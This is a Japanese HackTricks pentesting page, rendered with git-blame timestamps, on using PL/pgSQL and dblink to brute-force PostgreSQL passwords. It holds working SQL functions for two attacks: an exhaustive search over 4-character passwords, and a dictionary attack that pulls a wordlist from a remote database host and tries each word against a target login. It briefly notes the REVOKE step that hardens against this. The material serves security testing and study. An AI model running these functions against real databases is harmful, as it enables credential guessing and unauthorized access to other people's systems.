2023-07-07 23:42:27 +00:00
|
|
|
|
# PL/pgSQL パスワードブルートフォース
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
|
|
|
|
* [**公式のPEASS&HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
|
|
|
|
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PL/pgSQLは、**完全な機能を備えたプログラミング言語**であり、SQLよりもはるかに手続き的な制御が可能です。ループや他の制御構造を使用することができます。SQL文やトリガーは、PL/pgSQL言語で作成された関数を呼び出すことができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
この言語を悪用して、PostgreSQLにユーザーの資格情報をブルートフォースさせることができますが、データベース上に存在する必要があります。存在を確認するには、次のコマンドを使用します:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```sql
|
|
|
|
|
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
|
2023-07-07 23:42:27 +00:00
|
|
|
|
lanname | lanacl
|
|
|
|
|
---------+---------
|
|
|
|
|
plpgsql |
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
デフォルトでは、**関数の作成はPUBLICに付与された特権です**。ここで、PUBLICはそのデータベースシステム上のすべてのユーザーを指します。これを防ぐために、管理者はPUBLICドメインからUSAGE特権を取り消す必要がありました。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```sql
|
|
|
|
|
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
その場合、前のクエリは異なる結果を出力します:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```sql
|
|
|
|
|
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
|
2023-07-07 23:42:27 +00:00
|
|
|
|
lanname | lanacl
|
|
|
|
|
---------+-----------------
|
|
|
|
|
plpgsql | {admin=U/admin}
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
以下のスクリプトが動作するためには、**`dblink`関数が存在する必要があります**。もし存在しない場合は、以下のコマンドで作成してみることができます。
|
2022-12-21 00:29:12 +00:00
|
|
|
|
```sql
|
2022-12-20 18:10:20 +00:00
|
|
|
|
CREATE EXTENSION dblink;
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## パスワードブルートフォース
|
2022-12-20 18:10:20 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
以下は、4文字のパスワードブルートフォースを実行する方法です。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```sql
|
|
|
|
|
//Create the brute-force function
|
|
|
|
|
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
|
2023-07-07 23:42:27 +00:00
|
|
|
|
username TEXT, dbname TEXT) RETURNS TEXT AS
|
2020-07-15 15:43:14 +00:00
|
|
|
|
$$
|
|
|
|
|
DECLARE
|
2023-07-07 23:42:27 +00:00
|
|
|
|
word TEXT;
|
2020-07-15 15:43:14 +00:00
|
|
|
|
BEGIN
|
2023-07-07 23:42:27 +00:00
|
|
|
|
FOR a IN 65..122 LOOP
|
|
|
|
|
FOR b IN 65..122 LOOP
|
|
|
|
|
FOR c IN 65..122 LOOP
|
|
|
|
|
FOR d IN 65..122 LOOP
|
|
|
|
|
BEGIN
|
|
|
|
|
word := chr(a) || chr(b) || chr(c) || chr(d);
|
|
|
|
|
PERFORM(SELECT * FROM dblink(' host=' || host ||
|
|
|
|
|
' port=' || port ||
|
|
|
|
|
' dbname=' || dbname ||
|
|
|
|
|
' user=' || username ||
|
|
|
|
|
' password=' || word,
|
|
|
|
|
'SELECT 1')
|
|
|
|
|
RETURNS (i INT));
|
|
|
|
|
RETURN word;
|
|
|
|
|
EXCEPTION
|
|
|
|
|
WHEN sqlclient_unable_to_establish_sqlconnection
|
|
|
|
|
THEN
|
|
|
|
|
-- do nothing
|
|
|
|
|
END;
|
|
|
|
|
END LOOP;
|
|
|
|
|
END LOOP;
|
|
|
|
|
END LOOP;
|
|
|
|
|
END LOOP;
|
|
|
|
|
RETURN NULL;
|
2020-07-15 15:43:14 +00:00
|
|
|
|
END;
|
|
|
|
|
$$ LANGUAGE 'plpgsql';
|
|
|
|
|
|
|
|
|
|
//Call the function
|
|
|
|
|
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
_注意してください、4文字のブルートフォース攻撃でも数分かかる場合があります。_
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
また、**ワードリストをダウンロード**して、それらのパスワードのみを試すこともできます(辞書攻撃):
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```sql
|
|
|
|
|
//Create the function
|
|
|
|
|
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
|
2023-07-07 23:42:27 +00:00
|
|
|
|
username TEXT, dbname TEXT) RETURNS TEXT AS
|
2020-07-15 15:43:14 +00:00
|
|
|
|
$$
|
|
|
|
|
BEGIN
|
2023-07-07 23:42:27 +00:00
|
|
|
|
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
|
|
|
|
|
user=name
|
|
|
|
|
password=qwerty
|
|
|
|
|
dbname=wordlists',
|
|
|
|
|
'SELECT word FROM wordlist')
|
|
|
|
|
RETURNS (word TEXT)) LOOP
|
|
|
|
|
BEGIN
|
|
|
|
|
PERFORM(SELECT * FROM dblink(' host=' || host ||
|
|
|
|
|
' port=' || port ||
|
|
|
|
|
' dbname=' || dbname ||
|
|
|
|
|
' user=' || username ||
|
|
|
|
|
' password=' || word,
|
|
|
|
|
'SELECT 1')
|
|
|
|
|
RETURNS (i INT));
|
|
|
|
|
RETURN word;
|
|
|
|
|
|
|
|
|
|
EXCEPTION
|
|
|
|
|
WHEN sqlclient_unable_to_establish_sqlconnection THEN
|
|
|
|
|
-- do nothing
|
|
|
|
|
END;
|
|
|
|
|
END LOOP;
|
|
|
|
|
RETURN NULL;
|
2020-07-15 15:43:14 +00:00
|
|
|
|
END;
|
|
|
|
|
$$ LANGUAGE 'plpgsql'
|
|
|
|
|
|
|
|
|
|
//Call the function
|
|
|
|
|
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**この攻撃に関する詳細な情報は、[この論文](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)を参照してください。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝したいですか**?または、**PEASSの最新バージョンにアクセスしたいですか**、または**HackTricksをPDFでダウンロードしたいですか**?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
|
|
|
|
* [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
|
|
|
|
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私を[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローしてください**。
|
|
|
|
|
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください**。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|